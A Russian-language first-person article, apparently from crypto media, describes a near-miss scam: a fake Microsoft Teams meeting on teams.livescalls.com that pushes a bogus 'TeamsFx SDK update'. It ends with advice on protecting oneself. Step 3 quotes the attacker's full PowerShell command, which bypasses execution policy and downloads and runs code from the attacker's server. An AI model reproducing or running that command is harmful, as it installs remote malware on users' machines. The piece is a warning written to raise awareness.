Меня чуть не взломали во время звонка в Microsoft Teams — вот как работает эта афера

Позвольте мне рассказать, как я чуть не стал жертвой сложной схемы социальной инженерии, разработанной для того, чтобы сегодня воспользоваться такой обыденной и, казалось бы, безобидной вещью, как звонок в Microsoft Teams. 

На протяжении большей части общения ничего необычного не наблюдалось. 

Один человек, которого я считал своим деловым контактом, связался со мной, чтобы организовать встречу в Microsoft Teams, и мой дух сотрудничества позволил мне с радостью присоединиться к звонку. 

Внимание, спойлер: на другом конце провода был самозванец, и он пытался заставить меня запустить вредоносный код на моем компьютере. 

Я рассказываю здесь обо всем этом, чтобы предупредить друзей, знакомых и коллег по крипто- и Web3-сообществу. 

Сегодня чуть не случился мой случай; завтра же это может случиться с кем-то другим. 

Шаг 1: Подготовка — «Давай созвонимся, старый друг, чтобы обсудить все дела» 

Когда вы получаете сообщение с Telegram-аккаунта человека, которого знаете как высокопоставленного сотрудника известного крипто-PR-агентства, последнее, о чем вы думаете, это то, что вас затянуло в фишинговую схему. 

Ни один из типичных тревожных сигналов сразу же не проявился. 

Это был не случайный DM. 

Я общался не с аккаунтом, который выдает себя за другого человека, где буква «i» незаметно заменена на «l» 

У меня также была история переписки с этим аккаунтом, поэтому я думал, что общаюсь с реальным человеком на другом конце провода. 

С самого начала их дружелюбной беседы, направленной на возобновление общения, всё казалось вполне естественным. Вскоре они получили ссылку на Calendly для бронирования 30-минутной встречи и приглашение на звонок в Microsoft Teams.

Как я уже говорил, за всё время общения у меня ни разу не сработало какое-либо предупреждение. Я почувствовал тот же уровень профессионализма и терпения, который можно ожидать от высокопоставленного сотрудника ведущего PR-агентства. 

Всё, что я знал, это то, что я запланировал собрание в Teams через страницу Calendly у контакта из моей отрасли.

Мошенник инициирует контакт, используя взломанный аккаунт, и отправляет ссылку на собрание Teams.

Шаг 2: Ловушка «Подключение только с компьютера» 

Настал день встречи, и я, как делал это уже как минимум тысячу раз, перешёл по ссылке на собрание Teams на своём телефоне. Однако, как обычно, меня не перенаправило на собрание. Вместо перенаправления в звонок загрузился экран с сообщением: «Доступ к этому собранию с мобильных устройств запрещён из-за настроек организатора» 

«Ой-ой! Со мной такого раньше никогда не случалось» 

Ну, это тоже не былоdent . 

Оглядываясь назад, это, вероятно, был первый настоящий тревожный сигнал. 

Экран с ошибкой — это часть задумки. Мошенникам нужно, чтобы вы находились на настольном компьютере или ноутбуке, потому что их вредоносная программа представляет собой скрипт командной строки, который запускается только на ПК.

URL-адрес в браузере «teams.livescalls.com» НЕ является настоящим доменом Microsoft. 

Для проведения полноценных собраний Teams используйте teams.microsoft.com или teams.live.com. 

Домен «livescalls.com» издалека выглядит достаточно похожим на настоящий, но если присмотреться, то окажется совсем другим. 

Один из них — это сайт, контролируемый Microsoft, который утверждает, что у него более 320 миллионов активных пользователей в день. Другой — это полностью поддельный сайт, контролируемый злоумышленниками. 

Справедливости ради, некоторые организации могут использовать собственные домены для проведения командных собраний. Однако, по данным Всемирного экономического форума, в 2025 году мошенники потеряли более 1 триллиона долларов, и это стало для меня достаточной причиной, чтобы не игнорировать свою интуицию. 

Поддельная страница «Уведомление о доступе к Teams» блокирует доступ с мобильных устройств, вынуждая жертв использовать настольный компьютер, на котором может быть запущен вредоносный скрипт. Обратите внимание на URL: teams.livescalls.com — это не домен Microsoft.

Мошенник оказывает давление на жертву, требуя зарегистрироваться на компьютере после блокировки мобильной версии, утверждая, что «партнеры ждут»

Шаг 3: Полезная нагрузка — «Обновите свой SDK TeamsFx»

После загрузки на рабочий стол поддельная встреча Teams отображала профессионально оформленную страницу, похожую на ту, что можно увидеть в официальной документации Microsoft. На ней даже содержалась реальная информация от Microsoft о том, что SDK TeamsFx будет устаревшим к сентябрю 2025 года. 

Решение? Скопируйте блок кода и запустите его в терминале или командной строке.

Если вы сделаете дополнительный шаг и воспользуетесь поиском в Google, то обнаружите, что похожий SDK действительно существует. Просто он вам не понадобится для этого командного звонка. 

На первый взгляд код выглядит безобидно — он устанавливает переменные окружения с официальными именами, такими как TeamsFx_API_KEY и MS_Teams_API_SECRET. Но реальный вектор атаки находится где-то посередине, и эти злоумышленники не рассчитывают на то, что вы обнаружите проблему:

powershell -ep bypass -c “(iwr -Uri https://teams.livescalls.com/developer/sdk/update/version/085697307 -UserAgent 'teamsdk' -UseBasicParsing).Content | iex”

Эта единственная строка обходит политики безопасности PowerShell (-ep bypass), загружает код с сервера злоумышленника и немедленно его выполняет (iex = Invoke-Expression). 

И вот так, без лишних слов, вредоносное ПО, кейлоггер или инструмент удаленного доступа, размещенные злоумышленниками, незаметно устанавливаются на ваше устройство.

Поддельный интерфейс собрания Teams, демонстрирующий участникам вредоносную страницу «Обновление TeamsFx SDK». Обратите внимание на участников звонка — видео, сгенерированные искусственным интеллектом.

Шаг 4: Этап давления «Не волнуйтесь, это безопасно»

Когда я выразил сомнения по поводу запуска скрипта, самозванец тут же применил комбинацию заверений и давления. 

Фраза «Не волнуйтесь, это очень просто и безопасно» должна была помочь мне следовать инструкциям на скриншоте, показывающем, как открыть командную строку на моем компьютере. 

Сообщение «Партнёры уже присоединились к Zoom» должно было создать у меня ощущение давления, связанное с необходимостью заставлять всех переключаться между платформами только потому, что я не мог разобраться, как запустить простую командную строку.

Меня это не успокоило. И давления на меня тоже не оказывали.

Когда я предложил перенести звонок в Google Meet, они отказались. По-видимому, их мошенническая схема работает только через их поддельную конфигурацию Teams.

Мошенник присылает жертве пошаговые инструкции по запуску вредоносного кода, успокаивая её: «Не волнуйтесь, это очень просто и безопасно»

Шаг 5: Блеф разоблачен — Заблокировано и удалено

Мои подозрения подтвердились после проверки скрипта и домена: меня подвергали социальной инженерии, и я был в нескольких шагах от того, чтобы попасть в статистику Всемирного экономического форума 2026 года. 

Я прямо сказал мошеннику: «Я только что проверил, и эта команда, и указанный там сайт недействительны. К сожалению, я не смогу это сделать». Я предложил продолжить разговор в Google Meet, если они все еще хотят пообщаться.

«Но совещание уже идёт», — гласило сообщение с другого конца провода. 

Как и ожидалось, их ответ был призван заставить меня осознать срочность участия в звонке. В конце концов, я бы не хотел заставлять всех этих партнеров слишком долго ждать.

Спустя несколько мгновений они удалили всю нашу переписку и заблокировали меня. 

Ах… Это не просто тревожный сигнал. Это же просто нечто!. 

Контакты в деловой переписке не удаляют всю историю переписки и не блокируют вас в тот момент, когда вы задаете вопрос об обновлении программного обеспечения.

После того, как мошенничество было раскрыто, злоумышленник настаивает, что встреча «проводится прямо сейчас», после чего удаляет все сообщения и блокирует жертву.

Как защитить себя

Этот тип атак набирает обороты в криптоиндустрии, Web3 и технологической сфере. Мошенники взламывают или выдают себя за реальные аккаунты PR-специалистов, инвесторов и руководителей проектов, чтобы нацелиться на высокопоставленных лиц. Вот как оставаться в безопасности:

• Никогда не запускайте команды со страницы совещания. Ни одна легитимная платформа для видеозвонков никогда не попросит вас вставить код в терминал или командную строку.
• Проверьте URL-адрес. Настоящие собрания Microsoft Teams проводятся на teams.microsoft.com или teams.live.com, а не на «teams.livescalls.com» или любом другом похожем домене.
• Не стоит с подозрением относиться к требованиям "только настольные компьютеры". Если на встрече блокируется доступ с мобильных устройств, это преднамеренная тактика, чтобы заставить вас использовать компьютер, на котором можно выполнять скрипты.
• Проверьте личность человека по отдельному каналу. Если знакомый вам человек присылает необычную ссылку на встречу, позвоните ему напрямую или напишите сообщение на другой платформе для подтверждения.
• Обратите внимание на команды «powershell -ep bypass» и «iex». Это два самых тревожных сигнала в любом скрипте. Первая отключает защиту, вторая слепо выполняет загруженный код.
• Если вы уже запускали скрипт: немедленно отключитесь от интернета. Выполните полное сканирование на наличие вредоносных программ (Malwarebytes, Windows Defender Offline). Смените все пароли на другом, чистом устройстве. Отслеживайте криптовалютные кошельки и банковские счета на предмет несанкционированных транзакций.

Почему это важно для криптовалют и Web3

Я бы не назвал это типичной фишинговой атакой, когда злоумышленники забрасывают широкие сети, чтобы посмотреть, что им удастся поймать. 

Нет, это была целенаправленная многодневная операция по социальной инженерии. Злоумышленники несколько дней притворялись коллегами по отрасли, налаживая контакт и подстраиваясь под ситуацию, чтобы непринужденно помочь вам решить техническую проблему во время звонка в Teams, используя убедительную поддельную страницу Microsoft. 

Украдут ли они вашиdentданные, опустошат ваш криптовалютный кошелек или установят вредоносное ПО для удаленного доступа, злоумышленники только выиграют и ничего не потеряют. 

Если вы основатель компании, инвестор или кто-либо, кто проводит встречи в крипто- и технологической сфере, поделитесь этой статьей со своей командой. Мошенники становятся все более изощренными, и единственная защита — это осведомленность.